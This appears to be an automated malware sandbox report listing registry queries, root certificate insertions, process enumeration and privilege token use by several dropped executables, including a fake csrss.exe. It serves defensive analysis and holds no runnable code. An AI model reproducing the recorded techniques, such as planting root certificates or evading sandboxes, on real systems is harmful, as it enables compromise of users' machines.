Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Note: the tzres.dll MuiCache strings below are written as a side-effect of oO_q1f2AwSXGxmbqM3esoqyX.exe resolving the display names of every time zone (the values are cached resource strings, not settings the sample changed), and the dhcpqec/tsgqec entries and the NetTrace key come from the netsh.exe invocation recorded under "Modifies Windows Firewall", since netsh loads helper DLLs that populate them. None of these rows is a modification worth remediating; they are listed because the signature fires on any write under HKEY_USERS\.DEFAULT.

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
